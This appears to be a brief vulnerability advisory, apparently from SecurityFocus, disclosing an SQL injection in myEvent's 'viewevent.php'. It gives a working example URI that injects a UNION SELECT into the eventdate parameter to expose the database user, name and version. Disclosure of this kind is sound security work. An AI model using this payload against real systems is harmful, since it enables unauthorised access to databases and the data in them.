myEvent 'viewevent.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/viewevent.php?eventdate='+union+all+select+1,1,concat(user(),char(32,35),database(),char(32,35),version())/*


 

Privacy Statement
Copyright 2010, SecurityFocus